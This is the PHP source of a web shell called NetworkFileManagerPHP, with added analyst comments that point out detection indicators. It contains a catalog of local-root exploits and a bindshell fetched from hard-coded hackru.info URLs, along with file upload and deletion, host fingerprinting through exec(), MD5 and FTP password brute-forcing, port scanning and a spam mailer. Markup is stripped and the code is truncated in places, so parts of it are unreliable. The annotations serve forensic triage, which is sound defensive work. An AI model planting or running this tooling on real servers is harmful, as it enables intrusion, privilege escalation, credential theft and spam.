html;
/* Analyst note: $key is a hard-coded literal. It is pulled in as a global by crypte(), whose markup was stripped from this listing, so its exact role is not visible here. */
$key="goatse";
$string="";
/* randomizing letters array for random filenames of compression folders */
$CHARS = "abcdefghijklmnopqrstuvwxyz";
/* Appends six random lowercase letters to $pass. $pass is not initialised in the visible lines, and rand() is not a cryptographic generator, so the resulting name is unpredictable only in a weak sense. */
for ($i=0; $i<6; $i++) $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
/* set full path to host and dir where public exploits and soft are situated */
/* Analyst note: hard-coded remote staging location. The $public[n] file names assigned
   below are presumably appended to this base URL by upload_exploits(), but that
   function's body was stripped from this listing, so the fetch itself is not visible.
   The host name in the URL and the payload file names are usable as network and
   file-name indicators when triaging a server where this script was found. */
$public_site = "http://hackru.info/adm/exploits/public_exploits/";
/* $public_site = "http://localhost/adm/public_exploits/"; */
/* Public exploits and soft */
$public[1] = "s"; // bindshell
$title_ex[1] = "
bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)
Run: ./s
Connect tot host with your favorite telnet client. Best of them are putty and SecureCRT
";
$public[2] = "m"; // mremap
$title_ex[2] = "
MREMAP - allows to gain local root priveleges by exploiting the bug of memory .
Run: ./m
Note: Run only from telnet session, not from web!!!
";
$public[3] = "p"; // ptrace
$title_ex[3] = "
PTRACE - good one, works like mremap, but for another bug
Run: ./p
Note: Run only from telnet session, not from web!!!
";
$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
$title_ex[4] = "
psyBNC - Last release of favorite IRC bouncer
Decompression: tar -zxf psyBNC2.3.2-4.tar.gz // will be folder psybnc
Compilation, installing and running psybnc: make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password
Allowed to run with uid of apache, but check out the firewall!
";
/* Private exploits */
$private[1] = "brk"; // localroot root linux 2.4.*
$title_exp[1] = "
localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes
Run: ./brk
Note: Run only from telnet session, not from web!!!
";
$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
$title_exp[2] = "
lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon
There are 2 files: dupescan and glftpd To gain root uid, you need to write dupescan to
glftpd/bin/ with command cp dupescan glftpd/bin/, and after run ./glftpd. Get the root!!!
Note: Run only from telnet session, not from web!!!
";
$private[3] = "glftpd";
$title_exp[3] = "
lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon
part 2
Note: Run only from telnet session, not from web!!!
";
$private[4] = "sortrace";
$title_exp[4] = "
Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5
Run: ./sortrace
Note: Run only from telnet session, not from web!!!
";
$private[5] = "root";
$title_exp[5] = "
localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges
Run: ./root
Note: Run only from telnet session, not from web!!!
";
$private[6] = "sxp";
$title_exp[6] = "
Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x
Run: ./sxp
Note: Run only from telnet session, not from web!!!
";
$private[7] = "ptrace_kmod";
$title_exp[7] = "
localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root
Run: ./ptrace_kmod
Note: Run only from telnet session, not from web!!!
";
$private[8] = "mr1_a";
$title_exp[8] = "
localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x
Run: ./mr1_a
Note: Run only from telnet session, not from web!!!
";
/* set full path to host and dir where private exploits and soft are situated */
/* Analyst note: second hard-coded staging location, on the same host as $public_site.
   The $private[n] names above are presumably resolved against it; the code that does
   so is not visible in this listing. */
$private_site = "http://hackru.info/adm/exploits/private_exploits/";
endif;
/* Directory name used elsewhere in the script; its consumer is not visible in this listing. */
$createdir= "files";
/* spamer config */
/* Analyst note: hard-coded mail addresses and subject line. They are read by the mail
   routines (mailsystem()/spam() in the dispatcher), which are not part of this listing. */
$sendemail = "packetstorm@km.ru";
$confirmationemail = "packetstorm@km.ru";
$mailsubject = "Hello!This is a test message!";
/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING */
/* Analyst note: $action, $tm and $cm are never assigned in the visible code, yet the
   dispatcher branches on them. That is consistent with the script relying on
   register_globals to populate them from the request - confirm against an intact copy. */
global $action,$tm,$cm;
# Analyst note: status banner for the file-manager view.
# Splits getcwd() on "/" into $gsub (one path component per element, trailing slash
# kept) and $gdir (the cumulative prefix up to each component), prints the path and the
# free space of "./", then prints host details gathered with exec().
# Every exec() command string here is a fixed literal; none includes request data.
# Detection: the observable side effect is the web server's PHP process spawning
# `uname` and `cat` as child processes.
# tinhbyte() is defined outside this listing; presumably it formats a byte count - confirm.
# NOTE(review): the final print( below has no closing parenthesis, and the
# getdir()/readdirdata($tm) calls after it would recurse without end if they really
# belonged to this body. Both look like extraction damage (markup, and possibly another
# function header, were lost). Confirm against an intact copy.
function getdir() {
global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
$st = getcwd();
# Normalise Windows separators so the split below only has to handle "/".
$st = str_replace("\\","/",$st);
$j = 0;
$gdir = array();
$gsub = array();
print(" ");
# Character-by-character walk: $j advances each time a "/" is seen.
for ($i=0;$i<=(strlen($st)-1);$i++) {
if ($st[$i] != "/") {
$gdir[$j] = $gdir[$j].$st[$i];
$gsub[$j] = $gsub[$j].$st[$i];
} else {
$gdir[$j] = $gdir[$j]."/";
$gsub[$j] = $gsub[$j]."/";
# Seed the next prefix with everything accumulated so far.
$gdir[$j+1] = $gdir[$j];
$j++;
}
}
print("
Current directory: ");
for ($i = 0;$i<=$j;$i++) print("$gsub[$i]");
$free = tinhbyte(diskfreespace("./"));
print("
Current disk free space : $free
");
# Host fingerprinting: kernel/OS string, CPU lines, distribution release file.
print("
".exec("uname -a")."
");
print("
".exec("cat /proc/cpuinfo | grep GHz")." Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."
");
print("
Perhaps release is : ".exec("cat /etc/redhat-release")."
";
getdir();
readdirdata($tm);
}
# directory delete
# Analyst note: deletes one file, not a directory. The target is $tm."/".$fi, removed
# with unlink(); afterwards the directory listing is rendered again.
# $dir is accepted but never used. $tm and $fi are globals that are not assigned in
# this function and are not validated or confined to any base directory here, so the
# path is whatever the caller/request supplied. unlink()'s return value is ignored.
function deletef($dir)
{
global $action,$tm,$fi;
# Collapses each pair of backslashes into a single "/".
$tm = str_replace("\\\\","/",$tm);
$link = $tm."/".$fi;
unlink($link);
chdir($tm);
getdir();
readdirdata($tm);
}
# file upload
# Analyst note: only an echo of a bare newline remains. Presumably this printed the
# upload form and its HTML was stripped during extraction - confirm against an intact copy.
function uploadtem() {
global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
echo "
";
}
# Analyst note: arbitrary file write. Copies the uploaded temp file for form field
# "userfile" into $tm, keeping the client-supplied file name unchanged.
# What is absent matters for triage: no extension or content check, no
# move_uploaded_file()/is_uploaded_file() check, no restriction on $tm, and the
# client-supplied name is echoed back without HTML escaping.
# tmp_name and name are written as bare constants; old PHP versions treat them as the
# strings "tmp_name"/"name" with a notice.
# $set and $userfile are not declared global here, so both are undefined locals in
# this scope: the echo prints nothing and the @unlink() has no target.
function upload() {
global $HTTP_POST_FILES,$tm;
echo $set;
copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
echo "
File ".$HTTP_POST_FILES["userfile"][name]." was successfully uploaded.
";
@unlink($userfile);
chdir($tm);
getdir();
readdirdata($tm);
}
# get exploits
# Analyst note: every echo below prints only a newline; the markup that used the
# imported globals ($public_site, $private_site, $public, $private and the two title
# arrays) was stripped from this listing. Presumably it rendered the payload catalog
# defined at the top of the file - confirm against an intact copy.
# The dispatcher calls this function with an argument, but the signature takes none.
function upload_exploits() {
global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
echo "
";
}
# new directory creation
# Analyst note: prints a bare newline; presumably the "new directory" form markup was
# stripped during extraction. $dir, $tm and $nd are not used by what remains.
function newdir($dir) {
global $tm,$nd;
print("
");
}
# Analyst note: creates the directory $dir."/".$newd and re-renders the listing.
# $newd is a global that is not assigned or validated here, so the path is not
# confined to $dir. If something already exists at that path it is first removed with
# rmdir() (errors suppressed), then mkdir() is called requesting mode 0777, i.e.
# world-writable subject to the process umask. World-writable directories owned by
# the web server user are a useful artifact to look for during cleanup.
function cdir($dir) {
global $newd,$tm;
$fullpath = $dir."/".$newd;
if (file_exists($fullpath)) @rmdir($fullpath);
if (@mkdir($fullpath,0777)) {
echo "
Directory was created.
";
} else {
echo "
Error during directory creation.
";
}
chdir($tm);
getdir();
readdirdata($tm);
}
// creation of directory where exploits will be situated
# Analyst note: repeats the path-splitting loop from getdir() (cumulative prefixes in
# $gdir, single components in $gsub) and prints the current path. Whatever followed
# (the final echo now prints only a newline) was stripped from this listing.
# The dispatcher calls this with an argument, but the signature takes none.
function downfiles() {
global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
$st = getcwd();
$st = str_replace("\\","/",$st);
$j = 0;
$gdir = array();
$gsub = array();
print(" ");
# Character-by-character walk: $j advances each time a "/" is seen.
for ($i=0;$i<=(strlen($st)-1);$i++) {
if ($st[$i] != "/") {
$gdir[$j] = $gdir[$j].$st[$i];
$gsub[$j] = $gsub[$j].$st[$i];
} else {
$gdir[$j] = $gdir[$j]."/";
$gsub[$j] = $gsub[$j]."/";
$gdir[$j+1] = $gdir[$j];
$j++;
}
}
print("
Path: ");
for ($i = 0;$i<=$j;$i++) print("$gsub[$i]");
print("
");
echo "
";
}
# directory delete
# Analyst note: removes the directory $tm."/".$dd with rmdir(). Both parts are globals
# that are not assigned or validated here. The success message is printed before
# rmdir() runs and its return value is ignored, so the message is shown even when the
# removal fails (rmdir() only removes empty directories).
function deldir() {
global $dd,$tm;
$fullpath = $tm."/".$dd;
echo "
Directory was deleted successfully.
";
rmdir($fullpath);
chdir($tm);
getdir();
readdirdata($tm);
}
# directory compression
# Analyst note: builds $fullpath from the globals $tm and $tar and then prints a bare
# newline; the part that used $fullpath and $pass was stripped from this listing.
# Per the comment at the top of the file, $pass is the random name intended for
# compression folders. The dispatcher passes two arguments; the signature takes none.
function arhiv() {
global $tar,$tm,$pass;
$fullpath = $tm."/".$tar;
echo "
";
}
# Analyst note: prints the help text for the "upload without wget" page. Before doing
# so it calls ignore_user_abort(1) and set_time_limit(0), so the request keeps running
# after the client disconnects and has no execution time limit.
# The transfer logic itself is not in this listing (markup and code were stripped).
# NOTE(review): the second paragraph of the text reads like it belongs to the feedback
# form; it was probably merged in here by the extraction - confirm.
function down($dir) {
global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
ignore_user_abort(1);
set_time_limit(0);
echo "
File upload
There are many cases, when host, where NFM is situated WGET is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (seePath).(this works not everywhere)
During your work with script NetworkFileManagerPHP you may want to ask some quetions, or advice author to add some functions, which are not supported yet. Write them here, and your request will be sattisfied.
";
}
}
# help
# Analyst note: prints the static help/credits page. The text names the tool
# ("NetworkFileManagerPHP", abbreviated NFM elsewhere) and its contributors; these
# strings are stable enough to use for content-based identification of this script
# family on disk. No request data is used in what remains of the body.
function help() {
global $action,$REMOTE_ADDR,$HTTP_REFERER;
echo "
help for scriptNetworkFileManagerPHP
NetworkFileManagerPHP - script to access your host in a best way
There were added some commands to NFM, from scripts kind of itself. They are:
- Using aliases (Rush)
- FTP bruteforce (TerraByte)
- Translated to english by (revers)
- Added some sysinfo commands by (revers)
- All the rest code belongs to me (xoce)
- Thanks for testing goes to all #hack.ru channel
Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.
How can you find us:
Irc server: irc.megik.net:6667 /join #hack.ru
See you round at network!!!
";
}
}
}
}
# Analyst note: prints the help text for the "compress a folder to tar.gz" page after
# removing the execution time limit. The form and the archiving code are not in this
# listing. Per the text, the operator supplies a full path and the whole folder is
# archived; unexpected tar.gz files created by the web server user are the artifact
# to look for.
function tar() {
global $action, $filename;
set_time_limit(0);
echo "
Data compression
According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.
Warning! File passwd can have big size, so opening all users of this host can waste much time.
It's highly recommended! Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.
";
}
# Analyst note: prints the help text for the hashing page. The three trailing echo
# statements now print only newlines; presumably they rendered the forms that used
# $md5a, $sha1a, $crc32, $key and $string, but that markup was stripped - confirm.
function crypte() {
global $action,$md5a,$sha1a,$crc32, $key,$string;
echo "
Data crypter
Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.
";
echo "
";
echo "
";
echo "
";
}
# Analyst note: entry point for the MD5 guessing page. Prints the explanatory text
# and, when the POST field pass_de is present, records the start time/date in the
# globals $dat/$date and calls crack_md5().
# set_time_limit(0) plus ignore_user_abort(1) mean the search keeps running with no
# time limit even after the client disconnects; a PHP worker pinned at full CPU long
# after its request ended is the operational symptom.
# The htmlspecialchars()/stripslashes() pass only touches the global $pass_de;
# result() reads $_POST[pass_de] directly, so the cleaned copy is not what gets
# compared in the visible code.
function decrypte() {
global $action,$pass_de,$chars_de,$dat,$date;
set_time_limit(0);
ignore_user_abort(1);
echo "
Data decrypter
It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.
";
# No-op as written: assigns "" when the value already equals "".
if($chars_de==""){$chars_de="";}
echo "
";
# pass_de is a bare constant used as an array key (old-PHP style).
if($_POST[pass_de]){
$pass_de=htmlspecialchars($pass_de);
$pass_de=stripslashes($pass_de);
$dat=date("H:i:s");
$date=date("d:m:Y");
crack_md5();
}
}
# Analyst note: exhaustive candidate generator for the MD5 guessing page.
# For each $next from 0 to 31 it walks nested loops over the alphabet in the global
# $chars_de and hands every assembled candidate to result(), which compares its md5()
# with the submitted hash. Nesting depth is selected by $next: depths 2 through 31.
# Observations grounded in the code below:
#  - $next values 0, 1 and 2 all stop at depth 2, so the two-character pass runs
#    three times; there is no one-character pass.
#  - each loop runs while the index is <= strlen($chars_de), i.e. one position past
#    the end of the alphabet.
#  - the two str_replace() calls swap "<" and ">" for chr(60)/chr(62), which are the
#    same characters, so they change nothing.
#  - $chars is read from POST and never used.
#  - the $str{$i} offset syntax dates the file to old PHP; PHP 8 rejects it at parse time.
# Work grows exponentially with depth and the time limit is removed, so the practical
# effect on a host is a long-lived CPU-bound PHP worker.
function crack_md5() {
global $chars_de;
$chars=$_POST[chars];
set_time_limit(0);
ignore_user_abort(1);
$chars_de=str_replace("<",chr(60),$chars_de);
$chars_de=str_replace(">",chr(62),$chars_de);
$c=strlen($chars_de);
for ($next = 0; $next <= 31; $next++) {
for ($i1 = 0; $i1 <= $c; $i1++) {
$word[1] = $chars_de{$i1};
for ($i2 = 0; $i2 <= $c; $i2++) {
$word[2] = $chars_de{$i2};
if ($next <= 2) {
result(implode($word));
}else {
for ($i3 = 0; $i3 <= $c; $i3++) {
$word[3] = $chars_de{$i3};
if ($next <= 3) {
result(implode($word));
}else {
for ($i4 = 0; $i4 <= $c; $i4++) {
$word[4] = $chars_de{$i4};
if ($next <= 4) {
result(implode($word));
}else {
for ($i5 = 0; $i5 <= $c; $i5++) {
$word[5] = $chars_de{$i5};
if ($next <= 5) {
result(implode($word));
}else {
for ($i6 = 0; $i6 <= $c; $i6++) {
$word[6] = $chars_de{$i6};
if ($next <= 6) {
result(implode($word));
}else {
for ($i7 = 0; $i7 <= $c; $i7++) {
$word[7] = $chars_de{$i7};
if ($next <= 7) {
result(implode($word));
}else {
for ($i8 = 0; $i8 <= $c; $i8++) {
$word[8] = $chars_de{$i8};
if ($next <= 8) {
result(implode($word));
}else {
for ($i9 = 0; $i9 <= $c; $i9++) {
$word[9] = $chars_de{$i9};
if ($next <= 9) {
result(implode($word));
}else {
for ($i10 = 0; $i10 <= $c; $i10++) {
$word[10] = $chars_de{$i10};
if ($next <= 10) {
result(implode($word));
}else {
for ($i11 = 0; $i11 <= $c; $i11++) {
$word[11] = $chars_de{$i11};
if ($next <= 11) {
result(implode($word));
}else {
for ($i12 = 0; $i12 <= $c; $i12++) {
$word[12] = $chars_de{$i12};
if ($next <= 12) {
result(implode($word));
}else {
for ($i13 = 0; $i13 <= $c; $i13++) {
$word[13] = $chars_de{$i13};
if ($next <= 13) {
result(implode($word));
}else {
for ($i14 = 0; $i14 <= $c; $i14++) {
$word[14] = $chars_de{$i14};
if ($next <= 14) {
result(implode($word));
}else {
for ($i15 = 0; $i15 <= $c; $i15++) {
$word[15] = $chars_de{$i15};
if ($next <= 15) {
result(implode($word));
}else {
for ($i16 = 0; $i16 <= $c; $i16++) {
$word[16] = $chars_de{$i16};
if ($next <= 16) {
result(implode($word));
}else {
for ($i17 = 0; $i17 <= $c; $i17++) {
$word[17] = $chars_de{$i17};
if ($next <= 17) {
result(implode($word));
}else {
for ($i18 = 0; $i18 <= $c; $i18++) {
$word[18] = $chars_de{$i18};
if ($next <= 18) {
result(implode($word));
}else {
for ($i19 = 0; $i19 <= $c; $i19++) {
$word[19] = $chars_de{$i19};
if ($next <= 19) {
result(implode($word));
}else {
for ($i20 = 0; $i20 <= $c; $i20++) {
$word[20] = $chars_de{$i20};
if ($next <= 20) {
result(implode($word));
}else {
for ($i21 = 0; $i21 <= $c; $i21++) {
$word[21] = $chars_de{$i21};
if ($next <= 21) {
result(implode($word));
}else {
for ($i22 = 0; $i22 <= $c; $i22++) {
$word[22] = $chars_de{$i22};
if ($next <= 22) {
result(implode($word));
}else {
for ($i23 = 0; $i23 <= $c; $i23++) {
$word[23] = $chars_de{$i23};
if ($next <= 23) {
result(implode($word));
}else {
for ($i24 = 0; $i24 <= $c; $i24++) {
$word[24] = $chars_de{$i24};
if ($next <= 24) {
result(implode($word));
}else {
for ($i25 = 0; $i25 <= $c; $i25++) {
$word[25] = $chars_de{$i25};
if ($next <= 25) {
result(implode($word));
}else {
for ($i26 = 0; $i26 <= $c; $i26++) {
$word[26] = $chars_de{$i26};
if ($next <= 26) {
result(implode($word));
}else {
for ($i27 = 0; $i27 <= $c; $i27++) {
$word[27] = $chars_de{$i27};
if ($next <= 27) {
result(implode($word));
}else {
for ($i28 = 0; $i28 <= $c; $i28++) {
$word[28] = $chars_de{$i28};
if ($next <= 28) {
result(implode($word));
}else {
for ($i29 = 0; $i29 <= $c; $i29++) {
$word[29] = $chars_de{$i29};
if ($next <= 29) {
result(implode($word));
}else {
for ($i30 = 0; $i30 <= $c; $i30++) {
$word[30] = $chars_de{$i30};
if ($next <= 30) {
result(implode($word));
}else {
for ($i31 = 0; $i31 <= $c; $i31++) {
$word[31] = $chars_de{$i31};
if ($next <= 31) {
result(implode($word));
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
function result($word) {
global $dat,$date;
$pass_de=$_POST[pass_de];
$dat2=date("H:i:s");
$date2=date("d:m:Y");
if(md5($word)==$pass_de){
print "
This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload .
";
echo "
";
# Returns one character picked with mt_rand() from a fixed set of consonant letters.
# Building block for the pronounceable-word generators name0()..name11().
function s() {
$word="qwrtypsdfghjklzxcvbnm";
return $word[mt_rand(0,strlen($word)-1)];
}
# Returns one character picked with mt_rand() from "euioam".
# The upper bound is strlen($word)-2, so the last character ("m") is never returned;
# the effective set is the five vowels e, u, i, o, a.
function g() {
$word="euioam";
return $word[mt_rand(0,strlen($word)-2)];
}
# name0()..name11(): each returns a short pronounceable string by concatenating
# consonants from s() and vowels from g() in a fixed pattern (3 to 8 characters).
# randword() selects among them by building the function name at run time.
# Analyst note: these model human-chosen, name-like passwords; that class of password
# is what the guess list built from them is aimed at.
function name0() { return s().g().s(); }
function name1() { return s().g().s().g(); }
function name2() { return s().g().g().s(); }
function name3() { return s().s().g().s().g(); }
function name4() { return g().s().g().s().g(); }
function name5() { return g().g().s().g().s(); }
function name6() { return g().s().s().g().s(); }
function name7() { return s().g().g().s().g(); }
function name8() { return s().g().s().g().g(); }
function name9() { return s().g().s().g().s().g(); }
function name10() { return s().g().s().s().g().s().s(); }
function name11() { return s().g().s().s().g().s().s().g(); }
# Analyst note: two static guess lists used by the password-list builder below.
# $cool holds numeric suffixes (small numbers, repeated digits, and years 1978-2005);
# it is appended to generated words in randword() and to the target login further down.
# $cool2 holds common keyboard-walk and default passwords.
# Defensive takeaway: accounts whose password is one of these values, or the login
# name followed by a small number or a year, fall to the first guesses; these patterns
# belong on a password deny-list.
$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
# Returns one random password candidate.
# Two generator names ("name0".."name11") are chosen up front and called as variable
# functions. A third mt_rand(0,11) draw selects the shape:
#   0 -> word + number 5..99
#   1 -> word + "-" + second word
#   2 -> word + a suffix from the global $cool list
#   3 -> word + "!" + word (two separate calls of the same generator, so the halves differ)
#   4 -> randpass() string of 5..12 characters
#   5..11 (default) -> plain word
function randword() {
global $cool;
$func="name".mt_rand(0,11);
$func2="name".mt_rand(0,11);
switch (mt_rand(0,11)) {
case 0: return $func().mt_rand(5,99);
case 1: return $func()."-".$func2();
case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
case 3: return $func()."!".$func();
case 4: return randpass(mt_rand(5,12));
default: return $func();
}
}
# Returns a string of $len characters drawn with mt_rand() from lowercase letters and
# digits. Returns "" when $len is 0 or negative, because the loop body never runs.
function randpass($len) {
$word="qwertyuiopasdfghjklzxcvbnm1234567890";
$s="";
for ($i=0; $i<$len; $i++) {
$s.=$word[mt_rand(0,strlen($word)-1)];
}
return $s;
}
# Analyst note: builds the guess list for the FTP password-guessing feature and
# writes it to pass.txt in the script's current working directory.
# Detection/cleanup artifact: a file named pass.txt created by the web server user
# next to the script, rewritten on each run (it is deleted first).
# $host, $login, $proverka and $chislo are not assigned in the visible code;
# presumably they arrive from the request form, which was stripped - confirm.
# NOTE(review): the listing is damaged from the "for($i=0; $i" line onward: the loop
# that reads the list back and attempts the logins is missing, and the braces no
# longer balance. Nothing below that point can be relied on.
#
# unlink() returns a boolean, so the "< 0" test is never true and this exit is dead code.
if (@unlink("pass.txt") < 0){
echo "nothing";
exit;
}
$file="pass.txt";
if($file && $host && $login){
# mt_rand(30,30) is always 30: the first 30 entries of $cool2 are written.
$cn=mt_rand(30,30);
for ($i=0; $i<$cn; $i++) {
$s=$cool2[$i];
# pass is a bare constant; old PHP reads it as the string "pass", giving "pass.txt".
# The handle is reopened on every iteration and never closed.
$f=@fopen(pass.".txt","a+");
fputs($f,"$s\n");
}
# Always 43: the login name followed by each suffix in $cool.
$cnt2=mt_rand(43,43);
for ($i=0; $i<$cnt2; $i++) {
$r=$cool[$i];
$f=@fopen(pass.".txt","a+");
fputs($f,"$login$r\n");
}
# One operator-supplied entry ($proverka) is appended verbatim.
$p="$proverka";
$f=@fopen(pass.".txt","a+");
fputs($f,"$p\n");
# $chislo random candidates from randword() complete the list.
$cnt3=mt_rand($chislo,$chislo);
for ($i=0; $i<$cnt3; $i++) {
$u=randword();
$f=@fopen(pass.".txt","a+");
fputs($f,"$u\n");
}
if(is_file($file)){
$passwd=file($file,1000);
for($i=0; $i
Congratulations! Password is known now.
Connected to: $host with login: $login with password: $password
";
}
// SQL END
/* main() */
set_time_limit(0);
if ( $action !="download") print("$HTML");
if (!isset($cm)) {
if (!isset($action)) {
if (!isset($tm)) { $tm = getcwd(); }
$curdir = getcwd();
if (!@chdir($tm)) exit("
Access to directory is denied, see CHMOD.
");
getdir();
chdir($curdir);
$supsub = $gdir[$j-1];
if (!isset($tm) ) { $tm=getcwd();}
readdirdata($tm);
} else {
switch ($action) {
case "view":
viewfile($tm,$fi);
break;
case "delete":
echo "
File $fi was deleted successfully.
";
deletef($tm);
break;
case "download":
if (isset($fatt) && strlen($fatt)>0) {
$attach=$fatt;
header("Content-type: text/plain");
}
else {
$attach=$fi;
header("Content-type: hackru");
}
header("Content-disposition: attachment; filename=\"$attach\";");
readfile($tm."/".$fi);
break;
case "download_mail":
download_mail($tm,$fi);
break;
case "edit":
editfile($tm,$fi);
break;
case "save":
savefile($tm,$fi);
break;
case "uploadd":
uploadtem();
break;
case "up":
up($tm);
break;
case "newdir":
newdir($tm);
break;
case "createdir":
cdir($tm);
break;
case "deldir":
deldir();
break;
case "feedback":
mailsystem();
break;
case "upload":
upload();
break;
case "help":
help();
break;
case "ftp":
ftp();
break;
case "portscan":
portscan();
break;
case "sql":
sql();
break;
case "tar":
tar();
break;
case "bash":
bash();
break;
case "passwd":
passwd();
break;
case "exploits":
exploits($dir);
break;
case "upload_exploits":
upload_exploits($dir);
break;
case "upload_exploitsp":
upload_exploitsp($dir);
break;
case "arhiv":
arhiv($tm,$pass);
break;
case "crypte":
crypte();
break;
case "decrypte":
decrypte();
break;
case "brut_ftp":
brut_ftp();
break;
case "copyfile":
copyfile($tm,$fi);
break;
case "down":
down($dir);
break;
case "downfiles":
downfiles($dir);
break;
case "spam":
spam();
break;
}
}
} else {
echo "